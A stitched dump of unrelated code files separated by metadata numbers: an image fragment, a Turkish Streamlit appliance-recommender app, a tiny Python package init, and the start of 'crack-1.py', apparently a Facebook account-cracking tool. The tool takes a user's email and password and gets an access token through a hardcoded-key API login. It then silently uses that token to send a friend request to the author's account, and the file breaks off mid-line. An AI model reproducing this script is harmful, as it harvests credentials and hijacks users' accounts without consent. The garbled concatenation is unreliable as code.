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)](https://github.com/dogudogru)
") elif machine =="Çamaşır Makinesi": with st.sidebar: capacity_options = [' ','Düşük Kapasite','Orta Kapasite', 'Yüksek Kapasite'] capacity_help = '''Düşük kapasite: 0-6 KG , Orta Kapasite: 7-10 KG, Yüksek Kapasite: 10+ KG'''.strip() capacity = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin kapasitesi ne kadar olmalı?',options=capacity_options,help=capacity_help) cycle_options = [' ',"Düşük Devir","Orta Devir","Yüksek Devir"] cycle_help = '''Düşük devir: 1000'e kadar, Orta devir: 1000 - 1200, Yüksek Kapasite: 1200+'''.strip(",") cycle = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin devir sayısı ne olmalı?',options=cycle_options,help=cycle_help) size_options = [' ',"Küçük boyut","Standart Boyut","Standard üstü"] size = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin büyüklüğü ne kadar olmalı?',options=size_options) energy_usage_options = [' ','Çok önemli', 'Önemli', 'Az önemli', 'Önemsiz'] energy_usage_help = '''Çok Önemli: A+++ A++, Önemli : A+ A, Az Önemli: B C, Önemsiz: D E F G)'''.strip() energy_usage = st.sidebar.selectbox('Almak istediğiniz çamaşır makinesinin tükettiği enerji miktarı sizin için önemli mi?',options=energy_usage_options,help=energy_usage_help) soru_list = [capacity,cycle,size,energy_usage] soru_list1 = ["capacity","cycle","size","energy_usage"] soru_list2 = [capacity,cycle,size,energy_usage] if all([i == " " for i in soru_list2]): st.title('Bakalım sizin için nelerimiz var?') col1, col2, col3, col4, col5 = st.columns([1,1,1,1,1]) data3 = data2.sample(frac=1).drop_duplicates(['brand']).sample(10).reset_index() im1 = Image.open(requests.get(data3.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(data3.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(data3.image[2], stream=True).raw).resize((100,150)) im4 = Image.open(requests.get(data3.image[3], stream=True).raw).resize((100,150)) im5 = Image.open(requests.get(data3.image[4], stream=True).raw).resize((100,150)) im6 = Image.open(requests.get(data3.image[5], stream=True).raw).resize((100,150)) im7 = Image.open(requests.get(data3.image[6], stream=True).raw).resize((100,150)) im8 = Image.open(requests.get(data3.image[7], stream=True).raw).resize((100,150)) im9 = Image.open(requests.get(data3.image[8], stream=True).raw).resize((100,150)) im10 = Image.open(requests.get(data3.image[9], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.markdown(data3.brand[0]) b6 = st.image(im6, width=120) st.markdown(data3.brand[5]) with col2: b2 = st.image(im2, width=120) st.markdown(data3.brand[1]) b7 = st.image(im7, width=120) st.markdown(data3.brand[6]) with col3: b3 = st.image(im3, width=120) st.markdown(data3.brand[2]) b8 = st.image(im8, width=120) st.markdown(data3.brand[7]) with col4: b4 = st.image(im4, width=120) st.markdown(data3.brand[3]) b9 = st.image(im9, width=120) st.markdown(data3.brand[8]) with col5: b5 = st.image(im5, width=120) st.markdown(data3.brand[4]) b10 = st.image(im10, width=120) st.markdown(data3.brand[9]) elif any([i != " " for i in soru_list2]): for m in soru_list2: if m == " ": pass else: m_index = soru_list2.index(m) len_lst1.append(soru_list1[m_index]) len_lst2.append(m) for k in range(0,len(len_lst2)): dataf = dataf[dataf[len_lst1[k]] == len_lst2[k]] if len(dataf) == 0: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulunamadı") elif len(dataf) == 1: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulundu") dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], 
stream=True).raw).resize((100,150)) b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) elif len(dataf) == 2: st.title("Seçilen Kriterlere Uygun İki Ürün Bulundu") col1, col2 = st.columns([1,1]) dataf = dataf.reset_index() im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf.brand[1]) st.title("Fiyat") st.title(dataf.price[1]) elif len(dataf) == 3: st.title("Seçilen Kriterlere Uygun Üç Ürün Bulundu") col1, col2, col3 = st.columns([1,1,1]) im1 = Image.open(requests.get(dataf.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(dataf.image[2], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf.brand[0]) st.title("Fiyat") st.title(dataf.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf.brand[1]) st.title("Fiyat") st.title(dataf.price[1]) with col3: b3 = st.image(im3, width=120) st.title(dataf.brand[2]) st.title("Fiyat") st.title(dataf.price[2]) elif len(dataf) >3: st.title("Seçilen Kriterlere En Uygun Ürünler") ucuz = dataf.sort_values(by="price", ascending=True).reset_index() fp1 = dataf[dataf["puan"] > dataf["puan"].quantile(0.25)].sort_values(by="puan", ascending=False).reset_index() fp1 = fp1.drop(["index"],axis=1) fp2 = fp1[fp1["price"] <dataf["price"].quantile(0.75)].sort_values(by="puan", ascending=False).reset_index() fp2 = fp2.drop(["index"],axis=1) fp3 = fp2.sort_values(by="puan", ascending=False).reset_index() fp3 = fp3.drop(["index"],axis=1) if len(fp3.puan) == 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp3.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif len(fp3.puan) == 1: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp1.full_name[0] ) st.markdown("Fiyat : " + str(fp1.price[0]) ) elif len(fp3.puan) > 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], 
stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif machine =="Bulaşık Makinesi": capacity_options = [' ','Düşük Kapasite','Orta Kapasite', 'Yüksek Kapasite'] capacity_help = '''Düşük kapasite: 12 Kişilik ve Altı , Orta Kapasite: 13 Kişilik, Yüksek Kapasite: 14 Kişilik ve Üstü'''.strip() capacity = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin kapasitesi ne kadar olmalı?',options=capacity_options,help=capacity_help) type_options = [' ',"Solo","Ankastre"] type_help = '''Kullanım Tipi'''.strip(",") type_ = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin kullanım tipi nasıl olmalı?',options=type_options,help=type_help) size_options = [' ',"Küçük boyut","Standart Boyut","Standard üstü"] size = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin büyüklüğü ne kadar olmalı?',options=size_options) energy_usage_options = [' ','Çok önemli', 'Önemli', 'Az önemli', 'Önemsiz'] energy_usage_help = '''Çok Önemli: A+++ A++, Önemli : A+ A, Az Önemli: B C, Önemsiz: D E F G)'''.strip() energy_usage = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin tükettiği enerji miktarı sizin için önemli mi?',options=energy_usage_options,help=energy_usage_help) box_options = [' ',"Sepetli","Çekmeceli"] box_help = '''Çatal Kaşık Bölmesi Tipi'''.strip(",") box = st.sidebar.selectbox('Almak istediğiniz bulaşık makinesinin çatal kaşık bölmesi nasıl olmalı?',options=box_options,help=box_help) soru_list = [capacity,type_,size,energy_usage,box] soru_list1 = ["capacity","type_","size","energy_usage","box"] soru_list2 = [capacity,type_,size,energy_usage,box] if all([i == " " for i in soru_list2]): st.title('Bakalım sizin için nelerimiz var?') col1, col2, col3, col4, col5 = st.columns([1,1,1,1,1]) data2_b = data2_b[data2_b.image != "YOK"] data3 = data2_b.sample(frac=1).drop_duplicates(['brand']).sample(10).reset_index() im1 = Image.open(requests.get(data3.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(data3.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(data3.image[2], stream=True).raw).resize((100,150)) im4 = Image.open(requests.get(data3.image[3], stream=True).raw).resize((100,150)) im5 = Image.open(requests.get(data3.image[4], stream=True).raw).resize((100,150)) im6 = Image.open(requests.get(data3.image[5], stream=True).raw).resize((100,150)) im7 = Image.open(requests.get(data3.image[6], stream=True).raw).resize((100,150)) im8 = Image.open(requests.get(data3.image[7], stream=True).raw).resize((100,150)) im9 = Image.open(requests.get(data3.image[8], stream=True).raw).resize((100,150)) im10 = Image.open(requests.get(data3.image[9], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.markdown(data3.brand[0]) b6 = st.image(im6, width=120) st.markdown(data3.brand[5]) with col2: b2 = st.image(im2, width=120) st.markdown(data3.brand[1]) b7 = st.image(im7, width=120) 
st.markdown(data3.brand[6]) with col3: b3 = st.image(im3, width=120) st.markdown(data3.brand[2]) b8 = st.image(im8, width=120) st.markdown(data3.brand[7]) with col4: b4 = st.image(im4, width=120) st.markdown(data3.brand[3]) b9 = st.image(im9, width=120) st.markdown(data3.brand[8]) with col5: b5 = st.image(im5, width=120) st.markdown(data3.brand[4]) b10 = st.image(im10, width=120) st.markdown(data3.brand[9]) elif any([i != " " for i in soru_list2]): for m in soru_list2: if m == " ": pass else: m_index = soru_list2.index(m) len_lst1.append(soru_list1[m_index]) len_lst2.append(m) for k in range(0,len(len_lst2)): dataf_b = dataf_b[dataf_b[len_lst1[k]] == len_lst2[k]] if len(dataf_b) == 0: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulunamadı") elif len(dataf_b) == 1: st.title("Seçilen Kriterlere Uygun Bir Ürün Bulundu") dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) elif len(dataf_b) == 2: st.title("Seçilen Kriterlere Uygun İki Ürün Bulundu") col1, col2 = st.columns([1,1]) dataf_b = dataf_b.reset_index() im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf_b.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf_b.brand[1]) st.title("Fiyat") st.title(dataf_b.price[1]) elif len(dataf_b) == 3: st.title("Seçilen Kriterlere Uygun Üç Ürün Bulundu") col1, col2, col3 = st.columns([1,1,1]) im1 = Image.open(requests.get(dataf_b.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(dataf_b.image[1], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(dataf_b.image[2], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) st.title(dataf_b.brand[0]) st.title("Fiyat") st.title(dataf_b.price[0]) with col2: b2 = st.image(im2, width=120) st.title(dataf_b.brand[1]) st.title("Fiyat") st.title(dataf_b.price[1]) with col3: b3 = st.image(im3, width=120) st.title(dataf_b.brand[2]) st.title("Fiyat") st.title(dataf_b.price[2]) elif len(dataf_b) >3: st.title("Seçilen Kriterlere En Uygun Ürünler") ucuz = dataf_b.sort_values(by="price", ascending=True).reset_index() fp1 = dataf_b[dataf_b["puan"] > dataf_b["puan"].quantile(0.25)].sort_values(by="puan", ascending=False).reset_index() fp1 = fp1.drop(["index"],axis=1) fp2 = fp1[fp1["price"] <dataf_b["price"].quantile(0.75)].sort_values(by="puan", ascending=False).reset_index() fp2 = fp2.drop(["index"],axis=1) fp3 = fp2.sort_values(by="puan", ascending=False).reset_index() fp3 = fp3.drop(["index"],axis=1) if len(fp3.puan) == 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp3.image[1], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + 
fp3.full_name[1] ) st.markdown("Fiyat : " + str(fp3.price[1]) ) elif len(fp3.puan) == 1: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp1.full_name[0] ) st.markdown("Fiyat : " + str(fp1.price[0]) ) elif len(fp3.puan) > 2: col1, col2 = st.columns([1,1]) im1 = Image.open(requests.get(ucuz.image[0], stream=True).raw).resize((100,150)) im2 = Image.open(requests.get(fp3.image[0], stream=True).raw).resize((100,150)) im3 = Image.open(requests.get(fp1.image[0], stream=True).raw).resize((100,150)) with col1: b1 = st.image(im1, width=120) b2 = st.image(im2, width=120) b3 = st.image(im3, width=120) with col2: st.title("En Ucuz") st.markdown("Ürün Adı : " + ucuz.full_name[0], unsafe_allow_html=True) st.markdown("Fiyat : " + str(ucuz.price[0])) st.title("Fiyat Performans") st.markdown("Ürün Adı : " + fp3.full_name[0] ) st.markdown("Fiyat : " + str(fp3.price[0]) ) st.title(" ") st.title("Çok Satılan") st.markdown("Ürün Adı : " + fp3.full_name[3] ) st.markdown("Fiyat : " + str(fp3.price[3]) )
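Stripped of the Streamlit layout, the recommendation logic above is two steps: AND the answered criteria together as equality filters, then derive the "en ucuz" and "fiyat/performans" picks from price and review-score quantiles. A minimal standalone sketch of that idea, assuming pandas; `products` and `criteria` are illustrative stand-ins, not objects from the app:

import pandas as pd

# Hypothetical toy catalogue standing in for the app's scraped data.
products = pd.DataFrame({
    "brand": ["A", "B", "C", "D", "E"],
    "price": [7000, 9500, 8200, 12000, 6400],
    "puan":  [4.1, 4.7, 4.5, 4.8, 3.9],  # review score
    "capacity": ["Orta Kapasite"] * 3 + ["Yüksek Kapasite"] * 2,
})

# Step 1: keep only the answered questions and AND the filters together
# (" " marks an unanswered question, as in the app).
criteria = {"capacity": "Orta Kapasite", "cycle": " "}
matches = products
for column, answer in criteria.items():
    if answer != " " and column in matches.columns:
        matches = matches[matches[column] == answer]

# Step 2: two picks, mirroring the app's quantile cuts.
cheapest = matches.sort_values("price").iloc[0]
mid = matches[(matches["puan"] > matches["puan"].quantile(0.25))
              & (matches["price"] < matches["price"].quantile(0.75))]
price_perf = mid.sort_values("puan", ascending=False).iloc[0]

print(cheapest["brand"], price_perf["brand"])

The quantile cuts are what keep the price/performance pick from simply being the best-rated product: anything in the most expensive quarter of the matched set is excluded before ranking by score.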
93.256822
6,152
0.739789
9,066
116,198
9.421575
0.086256
0.012129
0.0205
0.024117
0.959738
0.947984
0.939836
0.938747
0.937518
0.933701
0
0.115551
0.168006
116,198
1,245
6,153
93.331727
0.767874
0.001076
0
0.811357
0
0.027911
0.581019
0.000709
0
1
0
0
0
1
0
false
0.00385
0.012512
0
0.012512
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
0
0
0
0
1
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
9
8d466268be4ca43162627719017d043b4440acde
70
py
Python
toon/anim/__init__.py
aforren1/peacoat
73c4c8f3fe429de262d32948ee43f2d5dde05570
[ "MIT" ]
null
null
null
toon/anim/__init__.py
aforren1/peacoat
73c4c8f3fe429de262d32948ee43f2d5dde05570
[ "MIT" ]
64
2017-06-11T21:18:12.000Z
2021-11-09T15:48:04.000Z
toon/anim/__init__.py
aforren1/toon
73c4c8f3fe429de262d32948ee43f2d5dde05570
[ "MIT" ]
null
null
null
from toon.anim.player import Player
from toon.anim.track import Track
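The package __init__ above only re-exports the two classes, so downstream code can import them from the package root; a minimal usage sketch (nothing beyond the import itself is shown in this record):

# The re-exports make this equivalent to importing from the submodules.
from toon.anim import Player, Track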
23.333333
35
0.828571
12
70
4.833333
0.5
0.275862
0.413793
0
0
0
0
0
0
0
0
0
0.114286
70
2
36
35
0.935484
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
8d6673575db1b884e0fb7de7d14b8d88f1c1c412
69,909
py
Python
crack-1.py
EmZee07/Zee007
3822cc6ccd096bb68d2872e0cf3348bbde0ba897
[ "Apache-2.0" ]
null
null
null
crack-1.py
EmZee07/Zee007
3822cc6ccd096bb68d2872e0cf3348bbde0ba897
[ "Apache-2.0" ]
null
null
null
crack-1.py
EmZee07/Zee007
3822cc6ccd096bb68d2872e0cf3348bbde0ba897
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # mau ngapain bro mau recode ea buat sendiri lah bgst import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize from multiprocessing.pool import ThreadPool from requests.exceptions import ConnectionError from mechanize import Browser reload(sys) sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] def keluar(): print '\x1b[1;91m[!] Closed' os.sys.exit() def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() logo = """ \033[1;91m╔═════════════════════════════════════════════╗ \033[1;91m║\033[1;93m* \033[1;97mAuthor \033[1;91m: \033[1;33m[OwL] \033[1;91m \033[1;91m║\033[1;93m* \033[1;97mGitHub \033[1;91m: \033[1;92m[https//:github.com/flyngdutchman] \033[1;91 \033[1;94m║\033[1;93m* \033[1;97mSupport \033[1;91m: \033[1;98m[Dominitriz] \033[1;95m[Bulus] \033[1;96m[EvilTwin] \033[1;95m \033[1;94m╚═══════════════════════\033[1;95m══════════════════════╝""" def tik(): titik = [ '. ', '.. ', '... '] for o in titik: print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading\x1b[1;97m' + o, sys.stdout.flush() time.sleep(1) back = 0 threads = [] berhasil = [] cekpoint = [] gagal = [] idfriends = [] idfromfriends = [] idmem = [] id = [] em = [] emfromfriends = [] hp = [] hpfromfriends = [] reaksi = [] reaksigrup = [] komen = [] komengrup = [] listgrup = [] vulnot = '\x1b[31mNot Vuln' vuln = '\x1b[32mVuln' def login(): os.system('clear') try: toket = open('login.txt', 'r') menu() except (KeyError, IOError): os.system('clear') print 55 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91mLOGIN AKUN FB DULU' print 55 * '\x1b[1;97m═' print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLOGIN AKUN FB \x1b[1;91m[\xe2\x98\x86]' id = raw_input('\x1b[1;91m[+] \x1b[1;36mEmail|ID \x1b[1;91m:\x1b[1;92m ') pwd = raw_input('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ') tik() try: br.open('https://m.facebook.com') except mechanize.URLError: print '\n\x1b[1;91m[!] Tidak ada koneksi' keluar() br._factory.is_html = True br.select_form(nr=0) br.form['email'] = id br.form['pass'] = pwd br.submit() url = br.geturl() if 'save-device' in url: try: sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'} x = hashlib.new('md5') x.update(sig) a = x.hexdigest() data.update({'sig': a}) url = 'https://api.facebook.com/restserver.php' r = requests.get(url, params=data) z = json.loads(r.text) zedd = open('login.txt', 'w') zedd.write(z['access_token']) zedd.close() print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil' print '\n\x1b[1;96mSELAMAT MEMAKAI SC NYA ^_^' time.sleep(2.5) requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token']) time.sleep(1) menu() except requests.exceptions.ConnectionError: print '\n\x1b[1;91m[!] 
Tidak ada koneksi' keluar() if 'checkpoint' in url: print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' os.system('rm -rf login.txt') keluar() else: print '\n\x1b[1;91m[!] Login Gagal' os.system('rm -rf login.txt') login() def menu(): try: toket = open('login.txt', 'r').read() except IOError: os.system('clear') print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') login() else: try: otw = requests.get('https://graph.facebook.com/me?access_token=' + toket) a = json.loads(otw.text) nama = a['name'] id = a['id'] ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket) b = json.loads(ots.text) sub = str(b['summary']['total_count']) except KeyError: os.system('clear') print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint' os.system('rm -rf login.txt') login() except requests.exceptions.ConnectionError: print logo print '\x1b[1;91m[!] Tidak Ada Koneksi' keluar() os.system('clear') print logo print '\x1b[1;93m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗' print '\xe2\x95\x91\x1b[1;93m[\x1b[1;93m\xe2\x9c\x93\x1b[1;93m]\x1b[1;93m Nama \x1b[1;93m: \x1b[1;92m' + nama + (33 - len(nama)) * '\x1b[1;93m ' + '║' print '\xe2\x95\x91\x1b[1;93m[\x1b[1;93m\xe2\x9c\x93\x1b[1;93m]\x1b[1;93m ID FB SAYA \x1b[1;93m: \x1b[1;92m' + id + (33 - len(id)) * '\x1b[1;93m ' + '║' print 